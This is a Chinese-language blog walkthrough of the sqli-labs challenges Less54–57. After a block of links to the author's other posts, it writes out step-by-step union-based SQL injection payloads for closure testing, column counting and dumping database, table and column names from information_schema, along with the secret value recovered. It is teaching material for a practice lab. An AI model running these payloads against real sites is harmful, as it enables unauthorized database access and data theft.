目录
三、Less54(GET - challenge - Union -10 queries allowed -Variation 1)
四、Less55(GET - challenge - Union -14 queries allowed -Variation 2)
五、Less56(GET - challenge - Union -14 queries allowed -Variation 3)
六、Less57(GET - challenge - Union -14 queries allowed -Variation 4)
一、推荐:
【SQL注入】联合查询(最简单的注入方法)https://blog.csdn.net/qq_53079406/article/details/125551764?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165796472016782248572807%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165796472016782248572807&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125551764-null-null.185^v2^control&utm_term=%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2&spm=1018.2226.3001.4450【SQL注入-可回显】报错注入:简介、相关函数、利用方法https://blog.csdn.net/qq_53079406/article/details/125017089?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165796474616782391887944%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165796474616782391887944&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125017089-null-null.185^v2^control&utm_term=%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5&spm=1018.2226.3001.4450
【SQL注入】堆叠注入https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501【SQL注入】数字型注入 & 字符型注入https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450
【SQL注入-无回显】布尔盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450【SQL注入-无回显】时间盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450
二、(手工)SQL注入基本步骤:
第一步:注入点测试
第二步:分析权限
第三步:判断字段数
第四步:爆数据库名
第五步:爆表名
第六步:爆字段名
第七步:爆数据
三、Less54(GET - challenge - Union -10 queries allowed -Variation 1)
3.1、简介:(联合查询-错误回显-GET注入)
请求方法:GET
方法:联合查询+错误回显+字符型注入
3.1、第一步:注入点测试
输入?id=1
正常进入
输入'
报错,说明存在注入点
?id=1'--+回显正常
说明为单引号闭合
3.3、第二步:分析过滤
方法一:
考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)
或者全部替换(如果报错,不知道哪里被过滤了)
方法二:
获取源码进行白盒审计(最优)
3.4、第三步:判断字段数/回显位
?id=1' order by 3--+
回显正常
?id=1' order by 4--+
报错
说明有3个字段
3.5、第四步:暴库
?id=-1' union select 1,database(),3 --+
3.6、第五步:爆表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
3.7、第六步:爆字段
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='gxkmo0iwcp' --+
3.9、第八步:爆数据
?id=-1' union select 1,2,secret_40S4 from challenges.gxkmo0iwcp --+
i2MhncxisHF58BLwGQmqXfd5
四、Less55(GET - challenge - Union -14 queries allowed -Variation 2)
4.1、简介:(联合查询-错误回显-GET注入)
请求方法:GET
方法:联合查询+错误回显+数字型注入
4.2、利用:
与Less54相比,将'闭合改为)闭合
五、Less56(GET - challenge - Union -14 queries allowed -Variation 3)
5.1、简介:(联合查询-错误回显-GET注入)
请求方法:GET
方法:联合查询+错误回显+字符型注入
5.2、利用:
与Less54相比
需要使用')闭合
六、Less57(GET - challenge - Union -14 queries allowed -Variation 4)
6.1、简介:(联合查询-错误回显-GET注入)
请求方法:GET
方法:联合查询+错误回显+字符型注入
6.2、利用:
与Less54相比
需要使用"闭合